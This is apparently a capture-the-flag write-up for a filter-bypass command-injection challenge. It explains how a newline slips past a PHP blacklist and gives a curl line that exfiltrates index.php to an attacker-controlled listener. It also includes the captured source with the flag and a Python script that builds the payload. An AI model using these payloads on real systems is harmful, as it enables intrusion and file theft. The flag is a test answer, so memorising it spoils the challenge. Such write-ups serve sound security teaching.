
Command injection - Filter bypass

Date: 2019-12-28 13:03:36

Tags: image, dde, two kinds, isset, inject, submit, flag, receive, position

Find a vulnerability in this service and exploit it. Some protections were added.
The flag is on the index.php file.


Two results observed:
  Ping OK
  (screenshot of the other response, not reproduced here)

Common command separators:
  &   runs the second command regardless of whether the first succeeded
  &&  runs the second command only if the first succeeded
  |   runs both commands, feeding the first command's stdout to the second
  ||  runs the second command only if the first failed
None of these work here: the preg_replace in index.php (shown in the captured source below) strips & and | along with $ ` ; < and >. A newline, %0A, is not on the blacklist and still separates commands inside the bash -c string.
  To confirm that the command after the newline is really executed, append sleep 60 and time the response. Since the server wraps the command in timeout 5, an executed sleep shows up as a response after roughly 5 s instead of the ~2 s the three pings take; the delay is capped, not 60 s.

Use curl to read index.php:
  payload: ip=127.0.0.1%0acurl -F `filename=@index.php` *.*.*.*:9999    (*.*.*.* is the VPS IP address)
  The backticks are removed by the filter, but curl -F filename=@index.php needs no quoting, so the command still runs as intended and POSTs the file to the listener.

On the VPS, listen with nc -lvvp 9999:
  Listening on [0.0.0.0] (family 0, port 9999)
  Connection from challenge01.root-me.org 49010 received!
  POST / HTTP/1.1
  Host: *.*.*.*:9999 
  User-Agent: curl/7.47.0
  Accept: */*
  Content-Length: 1008
  Expect: 100-continue
  Content-Type: multipart/form-data; boundary=------------------------0fee3a45749c037a

  --------------------------0fee3a45749c037a
  Content-Disposition: form-data; name="filename"; filename="index.php"
  Content-Type: application/octet-stream

  <html>
  <head>
  <title>Ping Service</title>
  </head>
  <body>
  <form method="POST" action="index.php">
  <input type="text" name="ip" placeholder="127.0.0.1">
  <input type="submit">
  </form>
  <pre>
  <?php
  $flag = "Comma@nd_1nJec7ion_Fl@9_1337_Th3_G@m3!!!";

  if(isset($_POST["ip"]) && !empty($_POST["ip"])){
  $ip = @preg_replace("/[\\\$|`;&<>]/", "", $_POST["ip"]);
  $response = @shell_exec("timeout 5 bash -c 'ping -c 3 ".$ip."'");
  $receive = @preg_match("/3 packets transmitted, (.*) received/s",$response,$out);

  if ($out[1]=="3")
  {
  echo "Ping OK";
  }
  elseif ($out[1]=="0")
  {
  echo "Ping NOK";
  }
  else
  {
  echo "Syntax Error";
  }
  }
  ?>
  </pre>
  </body>
  </html>
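The following is an added example, not code from the original write-up or from the challenge: it models the blacklist from the preg_replace above in Python, shows which separators survive it and why the newline payload and the curl exfiltration line reach bash intact, and contrasts the blacklist with the allow-list check a fixed form should use. The listener address 10.0.0.1:9999 and the TARGET URL are placeholders (assumptions); the network call is left commented out so the script runs offline.

```python
"""Model the challenge's blacklist filter locally and build newline payloads.

Added example, not the write-up's own code.  The listener host/port and the
TARGET URL are assumed placeholders.
"""
import ipaddress
import re
import time
import urllib.parse
import urllib.request

# Character class of the server's preg_replace("/[\\\$|`;&<>]/", "", ...)
# after PHP double-quote unescaping: $ | ` ; & < >
# Note what is NOT stripped: backslash, single quote, newline, space.
FILTER_RE = re.compile(r"[$|`;&<>]")


def apply_filter(ip):
    """Mimic the server-side blacklist: delete every listed character."""
    return FILTER_RE.sub("", ip)


def build_command(ip):
    """Mimic the string the server passes to shell_exec after filtering."""
    return "timeout 5 bash -c 'ping -c 3 " + apply_filter(ip) + "'"


def survives(payload):
    """True if the payload reaches bash with no character removed."""
    return apply_filter(payload) == payload


def injected_commands(ip):
    """Lines bash -c would execute: the ping, then anything placed after a
    newline, the separator the blacklist does not cover."""
    return build_command(ip).split("\n")


def exfil_payload(listener_host, listener_port, path="index.php"):
    """Newline-separated payload that uploads a file to nc -lvp <port>.
    curl -F accepts filename=@path unquoted, so no blacklisted char is needed."""
    return "127.0.0.1\ncurl -F filename=@%s %s:%d" % (path, listener_host, listener_port)


def is_valid_ip(ip):
    """Allow-list check a fixed form should use instead of a blacklist:
    the whole input must parse as an IP address, so any injected text fails."""
    try:
        ipaddress.ip_address(ip)
        return True
    except ValueError:
        return False


def send(url, ip, timeout=20):
    """POST ip=<payload> the way the HTML form does; return (body, seconds).
    Requires network access to the assumed TARGET; not called by default."""
    data = urllib.parse.urlencode({"ip": ip}).encode()
    start = time.monotonic()
    with urllib.request.urlopen(url, data=data, timeout=timeout) as resp:
        body = resp.read().decode(errors="replace")
    return body, time.monotonic() - start


if __name__ == "__main__":
    TARGET = "http://TARGET/index.php"  # assumption: replace with the real URL
    for p in ["127.0.0.1; id", "127.0.0.1 && id", "127.0.0.1 | id", "127.0.0.1\nid"]:
        print(repr(p), "->", repr(apply_filter(p)),
              "survives" if survives(p) else "mangled")
    print(injected_commands("127.0.0.1\nid"))
    print(exfil_payload("10.0.0.1", 9999))  # assumed listener address
    # Blind check against a live target: `sleep 60` is cut off by the server's
    # `timeout 5`, so an executed injection answers after ~5 s instead of the
    # ~2 s the three pings take.
    # body, secs = send(TARGET, "127.0.0.1\nsleep 60"); print(secs)
```

The allow-list check is the practitioner's takeaway: stripping a fixed set of metacharacters leaves newline, and anything else the author did not think of, untouched, whereas rejecting everything that is not an IP address removes the injection surface entirely.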



Original article: https://www.cnblogs.com/abbin-blog/p/12111302.html
